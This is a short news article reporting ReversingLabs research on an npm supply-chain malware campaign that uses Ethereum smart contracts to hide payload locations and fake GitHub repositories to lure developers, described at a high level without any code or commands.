Cybercriminals are increasingly turning to Ethereum smart contracts to disguise malicious code within open-source libraries, making detection and removal more challenging. Research by ReversingLabs reveals that hackers are embedding command-and-control instructions within blockchain contracts, potentially leading to increased complexity in malware distribution and the rise of blockchain as a tool for cybercrime. 🔒
In this recent campaign, attackers targeted the Node Package Manager (npm), a platform popular for JavaScript packages, leveraging suspicious npm packages ‘colortoolsv2’ and ‘mimelib2’ as carriers of malicious code.
Instead of directly embedding malicious links within these packages, the malware utilized obfuscated scripts that query Ethereum contracts to retrieve the payload location. This approach circumvents traditional detection systems by bypassing hard-coded malicious domains. 🕵️♂️
The attacker then used this access to download secondary malware components, allowing them to maintain flexibility in adjusting the payload locations on the blockchain without altering the npm package itself. Moreover, fake GitHub repositories filled with fabricated stars and commits were used to lure unsuspecting developers into integrating these packages.
This attack expands beyond a single instance of using npm and GitHub; it also targets a broader open-source platform. Fake repositories such as ‘solana-trading-bot-v2’ attempted to gain credibility through automated commits and staged community activity, while simultaneously spreading malware across multiple projects by rotating malicious dependencies under different names.
This development is particularly concerning because these attacks highlight the use of trusted platforms like npm and GitHub for distributing malicious code. The growing integration of blockchain technology in cybercrime further raises alarm bells about its increasing threat.